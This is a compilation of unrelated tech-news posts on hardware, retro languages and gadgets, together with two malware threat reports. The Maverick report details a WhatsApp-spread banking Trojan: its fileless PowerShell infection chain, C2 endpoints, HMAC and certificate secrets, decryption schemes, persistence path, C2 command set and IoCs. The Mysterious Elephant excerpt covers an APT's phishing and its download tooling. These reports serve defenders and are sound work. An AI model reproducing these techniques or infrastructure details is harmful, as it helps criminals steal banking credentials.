Using a calibrated 2.5 voltage source the accuracy of the measurements were also validated, which showed them to be too low by 12 mV. The good news was that a linear correction on the MCU can correct for this, but it shows that despite these parts being ADS1115 compatible and having features like the PGA working, you’re definitely getting dinged on performance and accuracy.
[James] said that he’s going to run the same tests on an ADS1115 board obtained from Adafruit, which likely will have the genuine part. Either way, if you are eyeing this ADC for your own projects, it pays to consider whether the compromises and potential broken-ness of the knockoffs are worth it over coughing up a bit more cash. As they say, caveat emptor.
Could This be the Year of Algol?
Ok, you caught us. It certainly isn’t going to be the year of Algol. When you think of “old” programming languages, you usually think of FORTRAN and COBOL. You should also think of LISP. But only a few people will come up with Algol. While not a household name, it was highly influential, and now, GCC is on the verge of supporting it just like it supports other languages besides C and C++ these days.
Why bring an old language up to the forefront? We don’t know, but we still find it interesting. We doubt there’s a bunch of Algol code waiting to be ported, but you never know.
Algol first appeared in 1958 and was the lingua franca of academic computer discussions for decades. It was made to “fix” the problems with Fortran, and its influence is still felt today.
For example, Algol was the origin of “blocks of code,” which Algol set between begin/end pairs. The second version of Algol was where Backus-Naur form, or BNF, originated, something still of interest to language designers today.
Interestingly, the new compiler will do Algol 68, which was the final and not terribly popular version. It was sort of the “New Coke” of early computer languages, with many people asserting that Algol 60 was the last “real Algol.” Algol was known for sometimes using funny characters like ≡ and ⊂, but, like APL, had to adapt to more conventional character sets. Most of the Algol specifications didn’t define I/O, either, so it wasn’t enough to know Algol. You had to know which Algol so you could understand how the I/O worked.
If you want to learn Algol, there’s a tutorial on GitHub (use the compiler online, if you like). While [Niklaus Wirth] didn’t create Algol, he was a major player in some of its later development.
youtube.com/embed/3aMwC24EcJk?…
Attack Turns Mouse into Microphone
As computer hardware gets better and better, most of the benefits are readily apparent to users. Faster processors, less power consumption, and lower cost are the general themes here. But sometimes increased performance comes with some unusual downsides. A research group at the University of California, Irvine found that high-performance mice have such good resolution that they can be used to spy on a user’s speech or other sounds around them.
The mice involved in this theoretical attack need to be in the neighborhood of 20,000 dpi, as well as having a relatively high sampling rate. With this combination it’s possible to sense detail fine enough to resolve speech from the vibrations of the mouse pad. Not only that, but the researchers noted that this also enables motion tracking of people in the immediate vicinity as the vibrations caused by walking can also be decoded. The attack does require a piece of malware to be installed somewhere on the computer, but the group also theorize that this could easily be done since most security suites don’t think of mouse input data as particularly valuable or vulnerable.
Even with the data from the mouse, an attacker needs a sophisticated software suite to be able to decode and filter the data to extract sounds, and the research team could only extract around 60% of the audio under the best conditions. The full paper is available here as well. That being said, mice will only get better from here so this is certainly something to keep an eye on. Mice aren’t the only peripherials that have roundabout attacks like this, either.
Thanks to [Stephen] for the tip!
youtube.com/embed/CY7Z37Ul8aQ?…
Printing an Air-Powered Integrated Circuit for Squishy Robots
There’s no rule that says that logic circuits must always use electrically conductive materials, which is why you can use water, air or even purely mechanical means to implement logic circuits. When it comes to [soiboi soft]’s squishy robots, it thus makes sense to turn the typical semiconductor control circuitry into an air-powered version as much as possible.
We previously featured the soft and squishy salamander robot that [soiboi] created using pneumatic muscles. While rather agile, it still has to drag a whole umbilical of pneumatic tubes along, with one tube per function. Most of the research is on microfluidics, but fortunately air is just a fluid that’s heavily challenged in the density department, allowing the designs to be adapted to create structures like gates and resistors.
Logically, a voltage potential or a pressure differential isn’t so different, and can be used in a similar way. A transistor for example is akin to the vacuum tube, which in British English is called a valve for good reason. Through creative use of a flexible silicone membrane and rigid channels, pulling a vacuum in the ‘gate’ channel allows flow through the other two channels.
Similarly, a ‘resistor’ is simply a narrowing of a channel, thus resisting flow. The main difference compared to the microfluidics versions is everything is a much larger scale. This does make it printable on a standard FDM printer, which is a major benefit.
Quantifying these pneumatic resistors took a bit of work, using a pressure sensor to determine their impact, but after that the first pneumatic logic circuits could be designed. The resistors are useful here as pull-downs, to ensure that any charge (air) is removed, while not impeding activation.
The design, as shown in the top image, is a 5-stage ring oscillator that provides locomotion to a set of five pneumatic muscles. As demonstrated at the end of video, this design allows for the entire walking motion to be powered using a single input of compressed air, not unlike the semiconductor equivalent running off a battery.
While the somewhat bulky nature of pneumatic logic prevents it from implementing very complex logic, using it for implementing something as predictable as a walking pattern as demonstrated seems like an ideal use case. When it comes to making these squishy robots stand-alone, it likely can reduce the overall bulk of the package, not to mention the power usage. We are looking forward to how [soiboi]’s squishy robots develop and integrate these pneumatic circuits.
youtube.com/embed/QJdBp5dGrww?…
FLOSS Weekly Episode 851: Buckets of Money
This week Jonathan talks to James Cole about Firefly III, the personal finance manager! This one itches James’ own itch, but brings great visualization and management tools for your personal finances!
youtube.com/embed/IH4aEnsl3eU?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/10/15/floss-…
2025 Hackaday Supercon: Crafting the Final Frontier Keynote Event
In the history of entertainment, few properties have made the sort of indelible mark on popular culture as Star Trek has. In 950 episodes across the twelve television series that have carried the name, the franchise has made a spectacle not of explosions and machismo, but of competent professionals working together to solve complex problems. In the world of Star Trek, the coolest people in the room are the scientists, engineers, physicists, and doctors — is it any wonder so many in the sciences credit the show for putting them on their career path?
While the art direction of the original Star Trek series from 1966 was remarkably ahead of its time, these are some of the key individuals who were brought in to refine those early rough-hewn ideas into cultural touchstones. Their work ended up becoming more than simple entertainment, and ultimately helped inspire some of the real-world technology we use on a daily basis. The iconic LCARS computer interface predicted the rise of the touch screen, while its impossible to look at props such as the PADD and Tricorder and not see the parallels with modern tablets and smartphones.
The following Star Trek veterans are set to join us at Supercon 2025:
Michael Okuda
Michael Okuda invented the iconic “LCARS” graphic style for Star Trek. He supervised graphics on four Star Trek series and six Trek movies. His work has earned him three primetime Emmy nominations and the NASA Exceptional Public Service medal.
Denise Okuda
Denise Okuda was video playback supervisor on Star Trek: Deep Space Nine and other Trek productions. She is coauthor of the Star Trek Encyclopedia and Chronology and recipient of the Art Directors Guild’s Lifetime Achievement award.
Rick Sternbach
Rick Sternbach is a Hugo and Emmy award-winning space and science fiction artist. His clients include NASA, Smithsonian, Analog and many others. With the rebirth of Star Trek, beginning with The Next Generation, Rick created new spacecraft, tricorders, phasers, and hundreds of other props and set pieces.
Liz Kloczkowski
Liz Kloczkowski is an art director and author of “Resurrecting the Enterprise-D”, renowned for her contributions to Star Trek: Picard. She played a pivotal role in designing Picard’s iconic sets, including the Eleos 12, the Titan-A’s sickbay, transporter room, nacelle room, environmental control room, crew quarters, and a faithful recreation of the Enterprise-D bridge.
Bear Burge
Bear Burge has over 40 years of experience in the television and movie industry as a professional prop fabricator, model maker, and machinist. He has created, fabricated, and designed iconic props for Star Trek, including Picard’s Ressikan Flute, Geordi’s VISOR, and Worf’s baldric.
Michael W. Moore
Michael W. Moore has worked in the entertainment industry for over 40+ years, specializing in prop fabrication and product development. Michael worked on multiple blockbusters including the Star Trek Franchise, and The Hobbit trilogy, as well as cult classics such as Beetlejuice, Gremlins 2, and Re-Animator.
Beaming Up October 31st
We’re just a few weeks away from the start of Supercon 2025. If you’re interested in checking out this stellar (no pun intended) panel, or any of the other fascinating talks and workshops we’ve already announced, there’s still time to get tickets.
But don’t wait too long. Something tells us that the rest of those tickets will get snapped up quickly once we finally reveal this year’s badge, which will be coming very soon.
Keep That Engine Running, With a Gassifier
Every now and then in histories of the 20th’s century’s earlier years, you will see pictures of cars and commercial vehicles equipped with bulky drums, contraptions to make their fuel from waste wood. These are portable gas generators known as gasifiers, and to show how they work there’s [Greenhill Forge] with a build video.
When you burn a piece of wood, you expect to see flame. But what you are looking at in that flame are the gaseous products of the wood breaking down under the heat of combustion. The gasifier carefully regulates a burn to avoid that final flame, with the flammable gasses instead being drawn off for use as fuel.
The chemistry is straightforward enough, with exothermic combustion producing heat, water vapour, and carbon dioxide, before a further endothermic reduction stage produces carbon monoxide and hydrogen. He’s running his system from charcoal which is close to pure carbon presumably to avoid dealing with tar, and at this stage he’s not adding any steam, so we’re a little mystified as to where the hydrogen comes from unless there is enough water vapour in the air.
His retort is fabricated from sheets steel, and is followed by a cyclone and a filter drum to remove particulates from the gas. It relies on a forced air draft from a fan or a small internal combustion engine, and we’re surprised both how quickly it ignites and how relatively low a temperature the output gas settles at. The engine runs with a surprisingly simple gas mixer in place of a carburetor, and seems to be quite smooth in operation.
This is one of those devices that has fascinated us for a long time, and we’re grateful for the chance to see it up close. The video is below the break, and we’re promised a series of follow-ups as the design is refined.
youtube.com/embed/nXEDKRbiJe4?…
Rubik’s WOWCube: What Really Makes a Toy?
If there ever was a toy that enjoys universal appeal and recognition, the humble Rubik’s Cube definitely is on the list. Invented in 1974 by sculptor and professor of architecture Ernő Rubik with originally the name of Magic Cube, it features a three-by-three grid of colored surfaces and an internal mechanism which allows for each of these individual sections of each cube face to be moved to any other face. This makes the goal of returning each face to its original single color into a challenge, one which has both intrigued and vexed many generations over the decades. Maybe you’ve seen one?
Although there have been some variations of the basic 3×3 grid cube design over the years, none have been as controversial as the recently introduced WOWCube. Not only does this feature a measly 2×2 grid on each face, each part of the grid is also a display that is intended to be used alongside an internal processor and motion sensors for digital games. After spending many years in development, the Rubik’s WOWCube recently went up for sale at $299, raising many questions about what market it’s really targeting.
Is the WOWCube a ‘real’ Rubik’s Cube, and what makes something into a memorable toy and what into a mere novelty gadget that is forgotten by the next year like a plague of fidget spinners?
The Cube’s Genius
Originally created as a 3D visualization aid for Rubik’s students, the key to the Cube is a sphere. Specifically, the rotation occurs around said internal sphere, with the outer elements interlocked in such a way that they allow for free movement along certain planes. It is this simple design that was turned into a toy by the 1980s, with its popularity surging and never really fading.
There are a few definitions of a ‘toy’, which basically all come down to ‘an object to play with’, meaning something that provides pleasure through act of interacting with it, whether that’s in the innocent sense of a child’s playing time, or the mind-in-gutter adult sense. These objects are thus effectively without real purpose other than to provide entertainment and potentially inflict basic skills on a developing mind.
Although this may seem like a clear-cut distinction, there is a major grey zone, inside of which we find things like of ‘educational toys’ and games like chess. These are toys which are explicitly designed to only provide some kind of reward after a puzzle is solved, often requiring various levels of mental exertion.
It’s hard to argue that a Rubik’s Cube isn’t an educational toy, especially considering its original purpose within the education system. After shuffling the faces of the cube, the goal is to somehow move the individual blocks of color back to their fellow colors on a singular face. This is a process that can be done through a variety of methods, the easiest of which is to recognize the patterns that are formed by the colors.
Generally, solving a Rubik’s Cube is done algorithmically, using visual recognition of patterns and applying the appropriate response. While a casual ‘Cuber’ can solve a standard 3×3 cube in less than half an hour using the basic layer-by-layer algorithm, so-called speedcubers can knock this down to a few seconds by applying far more complicated algorithms. As of May 2025 the world record for fastest single solve stands at 3.05 seconds, achieved by Xuanyi Geng.
In this regard, one can easily put Rubik’s Cube in the same general ‘toy’ category as games like chess, go, and shogi. Although the Cube isn’t by itself a multiplayer game, it also clearly invites competition and a social atmosphere in which to better oneself at the game.
Does It WOW?
With the Cube so firmly established in the global community’s psyche and the multi-colored ‘toy’ a symbol of why paying attention during math classes can absolutely pay off later in life, this brings us to the WOWCube. Looking at the official website for the item, one can’t help but feel less than inspired.
Backing up a bit, the device itself is already a major departure from the Cube. Although the WOWCube’s price tag at $299 is absolutely worthy of a ‘Wow’, the 2×2 configuration is decidedly underwhelming. Yes, it rotates like a Cube, and you could use it like a regular 2×2 Cube if that is your thing and you hate a challenge, but the general vibe is that you’re supposed to be playing the equivalent of Flash or phone games on the screens, in addition to using it like a geometrically-challenged smartphone to display statuses and notifications.
For these applications you have the use of a total of 24 1.4″ IPS LC displays, each with a 240 x 240 resolution. Due to the 2×2 configuration, you have eight blocks that can be moved around, each with its own built-in processor, battery, speaker and 6-axis IMU sensor for gyroscope and accelerometer functionality. These blocks communicate with each other using a magnetic system, and after up to five hours of play time you have to recharge it on the special charger.
Currently you can only pre-order the special Rubik’s WOWCube, with delivery expected ‘by Christmas 2025’. You can however get a good idea of what the experience will be like from videos like the 2022 review video of a pre-production unit by MetalJesusRocks, who also helpfully did a teardown while reconnecting the battery in one block after it disconnected during use.
Although this happened with a preproduction unit, it provides some indications regarding the expected lifespan of a WOWCube, as these devices are likely to experience constant mechanical forces being applied to it. With no touchscreen, you have to sometimes rather violently tap the cube or shake it to register user input, which will likely do wonders for long-term reliability.
In the earlier referenced pre-production review, the conclusion was – especially after having a group of random folk try it out – that although definitely an interesting device, it’s too expensive and too confused about who or what it is targeting. This is also the vibe in a brief production unit review by major gadget YouTube channel Mrwhosetheboss, whose ‘Overkill Toys’ video spent a few minutes fiddling with a 2023-era, $599 Black Edition WOWCube before giving it the ‘impressive, but why’ thumbs down.
This also reveals the interesting aspect here, namely that the WOWCube never was designed by the Rubik’s Cube company for Rubik’s Cube users, but rather it’s the Cubios Inc. company that created the WOWCube Entertainment System. The company that owns the Rubik’s brand name, Spin Master, has decided to make this $299 version of with official Rubik’s Cube branding. Basically, you could have bought your own WOWCube all along for the past few years now.
More Of A MehCube
Considering the overwhelming chorus of crickets that greeted the release of earlier versions of the WOWCube Entertainment System, it seems unlikely that slapping Rubik’s Cube branding on a WOWCube will do much to change the outcome. Although Cube enthusiasts don’t mind shelling out a few hundred bucks for a magnetically levitated, fairy dust-lubricated Cube to gain that 0.1 second advantage in competitive solving, this is totally distinct from this WOWCube product.
While absolutely impressive from a technological perspective, and likely a fun toy for (adult) children who can use it to keep themselves occupied with a range of potentially educational games, the price tag and potentially fragile nature of the device rather sours the deal. You do not want to give the WOWCube to a young child who may drop it harder than a $1,400 iPad, while giving Junior a dodgy $5 Rubik’s Cube clone to develop their algorithmic skills with is far less of a concern.
So if Rubik’s Cube fans don’t seem interested in this device, and the average person might be interested, but only if it was less than $100, it would seem that the WOWCube is condemned to be just another overpriced gadget, and not some kind of ‘digital re-imagining’ of the veritable Cube, as much as the marketing makes you want to sign up for a WOWClub subscription and obligatory ‘AI’ features.
Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distribution
A malware campaign was recently detected in Brazil, distributing a malicious LNK file using WhatsApp. It targets mainly Brazilians and uses Portuguese-named URLs. To evade detection, the command-and-control (C2) server verifies each download to ensure it originates from the malware itself.
The whole infection chain is complex and fully fileless, and by the end, it will deliver a new banking Trojan named Maverick, which contains many code overlaps with Coyote. In this blog post, we detail the entire infection chain, encryption algorithm, and its targets, as well as discuss the similarities with known threats.
Key findings:
- A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named “Maverick” through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform.
- Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts.
- The new Trojan features code similarities with another Brazilian banking Trojan called Coyote; however, we consider Maverick to be a new threat.
- The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed.
- The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay. It aims to capture banking credentials.
- Once active, the new Trojan will monitor the victims’ access to 26 Brazilian bank websites, 6 cryptocurrency exchange websites, and 1 payment platform.
- All infections are modular and performed in memory, with minimal disk activity, using PowerShell, .NET, and shellcode encrypted using Donut.
- The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development.
- Our solutions have blocked 62 thousand infection attempts using the malicious LNK file in the first 10 days of October, only in Brazil.
Initial infection vector
The infection chain works according to the diagram below:
The infection begins when the victim receives a malicious .LNK file inside a ZIP archive via a WhatsApp message. The filename can be generic, or it can pretend to be from a bank:
The message said, “Visualization allowed only in computers. In case you’re using the Chrome browser, choose “keep file” because it’s a zipped file”.
The LNK is encoded to execute cmd.exe with the following arguments:
The decoded commands point to the execution of a PowerShell script:
The command will contact the C2 to download another PowerShell script. It is important to note that the C2 also validates the “User-Agent” of the HTTP request to ensure that it is coming from the PowerShell command. This is why, without the correct “User-Agent”, the C2 returns an HTTP 401 code.
The entry script is used to decode an embedded .NET file, and all of this occurs only in memory. The .NET file is decoded by dividing each byte by a specific value; in the script above, the value is “174”. The PE file is decoded and is then loaded as a .NET assembly within the PowerShell process, making the entire infection fileless, that is, without files on disk.
Initial .NET loader
The initial .NET loader is heavily obfuscated using Control Flow Flattening and indirect function calls, storing them in a large vector of functions and calling them from there. In addition to obfuscation, it also uses random method and variable names to hinder analysis. Nevertheless, after our analysis, we were able to reconstruct (to a certain extent) its main flow, which consists of downloading and decrypting two payloads.
The obfuscation does not hide the method’s variable names, which means it is possible to reconstruct the function easily if the same function is reused elsewhere. Most of the functions used in this initial stage are the same ones used in the final stage of the banking Trojan, which is not obfuscated. The sole purpose of this stage is to download two encrypted shellcodes from the C2. To request them, an API exposed by the C2 on the “/api/v1/” routes will be used. The requested URL is as follows:
- hxxps://sorvetenopote.com/api/v1/3d045ada0df942c983635e
To communicate with its API, it sends the API key in the “X-Request-Headers” field of the HTTP request header. The API key used is calculated locally using the following algorithm:
- “Base64(HMAC256(Key))”
The HMAC is used to sign messages with a specific key; in this case, the threat actor uses it to generate the “API Key” using the HMAC key “MaverickZapBot2025SecretKey12345”. The signed data sent to the C2 is “3d045ada0df942c983635e|1759847631|MaverickBot”, where each segment is separated by “|”. The first segment refers to the specific resource requested (the first encrypted shellcode), the second is the infection’s timestamp, and the last, “MaverickBot”, indicates that this C2 protocol may be used in future campaigns with different variants of this threat. This ensures that tools like “wget” or HTTP downloaders cannot download this stage, only the malware.
Upon response, the encrypted shellcode is a loader using Donut. At this point, the initial loader will start and follow two different execution paths: another loader for its WhatsApp infector and the final payload, which we call “MaverickBanker”. Each Donut shellcode embeds a .NET executable. The shellcode is encrypted using a XOR implementation, where the key is stored in the last bytes of the binary returned by the C2. The algorithm to decrypt the shellcode is as follows:
- Extract the last 4 bytes (int32) from the binary file; this indicates the size of the encryption key.
- Walk backwards until you reach the beginning of the encryption key (file size – 4 – key_size).
- Get the XOR key.
- Apply the XOR to the entire file using the obtained key.
WhatsApp infector downloader
After the second Donut shellcode is decrypted and started, it will load another downloader using the same obfuscation method as the previous one. It behaves similarly, but this time it will download a PE file instead of a Donut shellcode. This PE file is another .NET assembly that will be loaded into the process as a module.
One of the namespaces used by this .NET executable is named “Maverick.StageOne,” which is considered by the attacker to be the first one to be loaded. This download stage is used exclusively to download the WhatsApp infector in the same way as the previous stage. The main difference is that this time, it is not an encrypted Donut shellcode, but another .NET executable—the WhatsApp infector—which will be used to hijack the victim’s account and use it to spam their contacts in order to spread itself.
This module, which is also obfuscated, is the WhatsApp infector and represents the final payload in the infection chain. It includes a script from WPPConnect, an open-source WhatsApp automation project, as well as the Selenium browser executable, used for web automation.
The executable’s namespace name is “ZAP”, a very common word in Brazil to refer to WhatsApp. These files use almost the same obfuscation techniques as the previous examples, but the method’s variable names remain in the source code. The main behavior of this stage is to locate the WhatsApp window in the browser and use WPPConnect to instrument it, causing the infected victim to send messages to their contacts and thus spread again. The file sent depends on the “MaverickBot” executable, which will be discussed in the next section.
Maverick, the banking Trojan
The Maverick Banker comes from a different execution branch than the WhatsApp infector; it is the result of the second Donut shellcode. There are no additional download steps to execute it. This is the main payload of this campaign and is embedded within another encrypted executable named “Maverick Agent,” which performs extended activities on the machine, such as contacting the C2 and keylogging. It is described in the next section.
Upon the initial loading of Maverick Banker, it will attempt to register persistence using the startup folder. At this point, if persistence does not exist, by checking for the existence of a .bat file in the “Startup” directory, it will not only check for the file’s existence but also perform a pattern match to see if the string “for %%” is present, which is part of the initial loading process. If such a file does not exist, it will generate a new “GUID” and remove the first 6 characters. The persistence batch script will then be stored as:
- “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\” + “HealthApp-” + GUID + “.bat”.
Next, it will generate the bat command using the hardcoded URL, which in this case is:
- “hxxps://sorvetenopote.com” + “/api/itbi/startup/” + NEW_GUID.
In the command generation function, it is possible to see the creation of an entirely new obfuscated PowerShell script.
First, it will create a variable named “$URL” and assign it the content passed as a parameter, create a “Net.WebClient” object, and call the “DownloadString.Invoke($URL)” function. Immediately after creating these small commands, it will encode them in base64. In general, the script will create a full obfuscation using functions to automatically and randomly generate blocks in PowerShell. The persistence script reassembles the initial LNK file used to start the infection.
This persistence mechanism seems a bit strange at first glance, as it always depends on the C2 being online. However, it is in fact clever, since the malware would not work without the C2. Thus, saving only the bootstrap .bat file ensures that the entire infection remains in memory. If persistence is achieved, it will start its true function, which is mainly to monitor browsers to check if they open banking pages.
The browsers running on the machine are checked for possible domains accessed on the victim’s machine to verify the web page visited by the victim. The program will use the current foreground window (window in focus) and its PID; with the PID, it will extract the process name. Monitoring will only continue if the victim is using one of the following browsers:
* Chrome
* Firefox
* MS Edge
* Brave
* Internet Explorer
* Specific bank web browser
If any browser from the list above is running, the malware will use UI Automation to extract the title of the currently open tab and use this information with a predefined list of target online banking sites to determine whether to perform any action on them. The list of target banks is compressed with gzip, encrypted using AES-256, and stored as a base64 string. The AES initialization vector (IV) is stored in the first 16 bytes of the decoded base64 data, and the key is stored in the next 32 bytes. The actual encrypted data begins at offset 48.
This encryption mechanism is the same one used by Coyote, a banking Trojan also written in .NET and documented by us in early 2024.
If any of these banks are found, the program will decrypt another PE file using the same algorithm described in the .NET Loader section of this report and will load it as an assembly, calling its entry point with the name of the open bank as an argument. This new PE is called “Maverick.Agent” and contains most of the banking logic for contacting the C2 and extracting data with it.
Maverick Agent
The agent is the binary that will do most of the banker’s work; it will first check if it is running on a machine located in Brazil. To do this, it will check the following constraints:
What each of them does is:
- IsValidBrazilianTimezone()
Checks if the current time zone is within the Brazilian time zone range. Brazil has time zones between UTC-5 (-300 min) and UTC-2 (-120 min). If the current time zone is within this range, it returns “true”. - IsBrazilianLocale()
Checks if the current thread’s language or locale is set to Brazilian Portuguese. For example, “pt-BR”, “pt_br”, or any string containing “portuguese” and “brazil”. Returns “true” if the condition is met. - IsBrazilianRegion()
Checks if the system’s configured region is Brazil. It compares region codes like “BR”, “BRA”, or checks if the region name contains “brazil”. Returns “true” if the region is set to Brazil. - IsBrazilianDateFormat()
Checks if the short date format follows the Brazilian standard. The Brazilian format is dd/MM/yyyy. The function checks if the pattern starts with “dd/” and contains “/MM/” or “dd/MM”.
Right after the check, it will enable appropriate DPI support for the operating system and monitor type, ensuring that images are sharp, fit the correct scale (screen zoom), and work well on multiple monitors with different resolutions. Then, it will check for any running persistence, previously created in “C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\”. If more than one file is found, it will delete the others based on “GetCreationTime” and keep only the most recently created one.
C2 communication
Communication uses the WatsonTCP library with SSL tunnels. It utilizes a local encrypted X509 certificate to protect the communication, which is another similarity to the Coyote malware. The connection is made to the host “casadecampoamazonas.com” on port 443. The certificate is exported as encrypted, and the password used to decrypt it is Maverick2025!. After the certificate is decrypted, the client will connect to the server.
For the C2 to work, a specific password must be sent during the first contact. The password used by the agent is “101593a51d9c40fc8ec162d67504e221”. Using this password during the first connection will successfully authenticate the agent with the C2, and it will be ready to receive commands from the operator. The important commands are:
| Command | Description |
| INFOCLIENT | Returns the information of the agent, which is used to identify it on the C2. The information used is described in the next section. |
| RECONNECT | Disconnect, sleep for a few seconds, and reconnect again to the C2. |
| REBOOT | Reboot the machine |
| KILLAPPLICATION | Exit the malware process |
| SCREENSHOT | Take a screenshot and send it to C2, compressed with gzip |
| KEYLOGGER | Enable the keylogger, capture all locally, and send only when the server specifically requests the logs |
| MOUSECLICK | Do a mouse click, used for the remote connection |
| KEYBOARDONECHAR | Press one char, used for the remote connection |
| KEYBOARDMULTIPLESCHARS | Send multiple characters used for the remote connection |
| TOOGLEDESKTOP | Enable remote connection and send multiple screenshots to the machine when they change (it computes a hash of each screenshot to ensure it is not the same image) |
| TOOGLEINTERN | Get a screenshot of a specific window |
| GENERATEWINDOWLOCKED | Lock the screen using one of the banks’ home pages. |
| LISTALLHANDLESOPENEDS | Send all open handles to the server |
| KILLPROCESS | Kill some process by using its handle |
| CLOSEHANDLE | Close a handle |
| MINIMIZEHANDLE | Minimize a window using its handle |
| MAXIMIZEHANDLE | Maximize a window using its handle |
| GENERATEWINDOWREQUEST | Generate a phishing window asking for the victim’s credentials used by banks |
| CANCELSCREENREQUEST | Disable the phishing window |
Agent profile info
In the “INFOCLIENT” command, the information sent to the C2 is as follows:
- Agent ID: A SHA256 hash of all primary MAC addresses used by all interfaces
- Username
- Hostname
- Operating system version
- Client version (no value)
- Number of monitors
- Home page (home): “home” indicates which bank’s home screen should be used, sent before the Agent is decrypted by the banking application monitoring routine.
- Screen resolution
Conclusion
According to our telemetry, all victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location. Even so, the malware is designed to target only Brazilians at the moment.
It is evident that this threat is very sophisticated and complex; the entire execution chain is relatively new, but the final payload has many code overlaps and similarities with the Coyote banking Trojan, which we documented in 2024. However, some of the techniques are not exclusive to Coyote and have been observed in other low-profile banking Trojans written in .NET. The agent’s structure is also different from how Coyote operated; it did not use this architecture before.
It is very likely that Maverick is a new banking Trojan using shared code from Coyote, which may indicate that the developers of Coyote have completely refactored and rewritten a large part of their components.
This is one of the most complex infection chains we have ever detected, designed to load a banking Trojan. It has infected many people in Brazil, and its worm-like nature allows it to spread exponentially by exploiting a very popular instant messenger. The impact is enormous. Furthermore, it demonstrates the use of AI in the code-writing process, specifically in certificate decryption, which may also indicate the involvement of AI in the overall code development. Maverick works like any other banking Trojan, but the worrying aspects are its delivery method and its significant impact.
We have detected the entire infection chain since day one, preventing victim infection from the initial LNK file. Kaspersky products detect this threat with the verdict HEUR:Trojan.Multi.Powenot.a and HEUR:Trojan-Banker.MSIL.Maverick.gen.
IoCs
| Dominio | IP | ASN |
| casadecampoamazonas[.]com | 181.41.201.184 | 212238 |
| sorvetenopote[.]com | 77.111.101.169 | 396356 |
More Than 100 Sub-Circuit Designs from Texas Instruments
We were recently tipped off to quite a resource — on the Texas Instruments website, there’s a page where you can view and download a compendium of analog sub-circuits.
Individual circuits can be downloaded in the form of PDF files. If you chose to register (which is free), you’ll also gain access to the pair of e-books listed at the bottom of the page: Analog Engineer’s Circuit Cookbook: Amplifiers and Analog Engineer’s Circuit Cookbook: Data Converters. The data converter circuits can be further subdivided into analog-to-digital converter (ADC) circuits and digital-to-analog converter (DAC) circuits.
There are more than 60 amplifier circuits including basic circuits, current sensing circuits, signal sources, current sources, filters, non-linear circuits (rectifiers/clamps/peak detectors), signal conditioning, comparators, sensor acquisition, audio, and integrated amplifier circuits using MSP430 microcontrollers.
You’ll also find 39 analog-to-digital converter (ADC) circuits including low-power, small size, and cost optimized circuits; level translation and input drive circuits; low-level sensor input circuits; input protection, filtering and isolation circuits; and commonly used auxiliary circuits. Finally, there are 15 digital-to-analog converter (DAC) circuits including audio outputs, auxiliary and biasing circuits, current sources, and voltage sources.
Thanks to [Lee Leduc] for letting us know over on the EEVblog Forum.
Mysterious Elephant: a growing threat
Introduction
Mysterious Elephant is a highly active advanced persistent threat (APT) group that we at Kaspersky GReAT discovered in 2023. It has been consistently evolving and adapting its tactics, techniques, and procedures (TTPs) to stay under the radar. With a primary focus on targeting government entities and foreign affairs sectors in the Asia-Pacific region, the group has been using a range of sophisticated tools and techniques to infiltrate and exfiltrate sensitive information. Notably, Mysterious Elephant has been exploiting WhatsApp communications to steal sensitive data, including documents, pictures, and archive files.
The group’s latest campaign, which began in early 2025, reveals a significant shift in their TTPs, with an increased emphasis on using new custom-made tools as well as customized open-source tools, such as BabShell and MemLoader modules, to achieve their objectives. In this report, we will delve into the history of Mysterious Elephant’s attacks, their latest tactics and techniques, and provide a comprehensive understanding of this threat.
The emergence of Mysterious Elephant
Mysterious Elephant is a threat actor we’ve been tracking since 2023. Initially, its intrusions resembled those of the Confucius threat actor. However, further analysis revealed a more complex picture. We found that Mysterious Elephant’s malware contained code from multiple APT groups, including Origami Elephant, Confucius, and SideWinder, which suggested deep collaboration and resource sharing between teams. Notably, our research indicates that the tools and code borrowed from the aforementioned APT groups were previously used by their original developers, but have since been abandoned or replaced by newer versions. However, Mysterious Elephant has not only adopted these tools, but also continued to maintain, develop, and improve them, incorporating the code into their own operations and creating new, advanced versions. The actor’s early attack chains featured distinctive elements, such as remote template injections and exploitation of CVE-2017-11882, followed by the use of a downloader called “Vtyrei”, which was previously connected to Origami Elephant and later abandoned by this group. Over time, Mysterious Elephant has continued to upgrade its tools and expanded its operations, eventually earning its designation as a previously unidentified threat actor.
Latest campaign
The group’s latest campaign, which was discovered in early 2025, reveals a significant shift in their TTPs. They are now using a combination of exploit kits, phishing emails, and malicious documents to gain initial access to their targets. Once inside, they deploy a range of custom-made and open-source tools to achieve their objectives. In the following sections, we’ll delve into the latest tactics and techniques used by Mysterious Elephant, including their new tools, infrastructure, and victimology.
Spear phishing
Mysterious Elephant has started using spear phishing techniques to gain initial access. Phishing emails are tailored to each victim and are convincingly designed to mimic legitimate correspondence. The primary targets of this APT group are countries in the South Asia (SA) region, particularly Pakistan. Notably, this APT organization shows a strong interest and inclination towards diplomatic institutions, which is reflected in the themes covered by the threat actor’s spear phishing emails, as seen in bait attachments.
Spear phishing email used by Mysterious Elephant
For example, the decoy document above concerns Pakistan’s application for a non-permanent seat on the United Nations Security Council for the 2025–2026 term.
Malicious tools
Mysterious Elephant’s toolkit is a noteworthy aspect of their operations. The group has switched to using a variety of custom-made and open-source tools instead of employing known malware to achieve their objectives.
PowerShell scripts
The threat actor uses PowerShell scripts to execute commands, deploy additional payloads, and establish persistence. These scripts are loaded from C2 servers and often use legitimate system administration tools, such as curl and certutil, to download and execute malicious files.
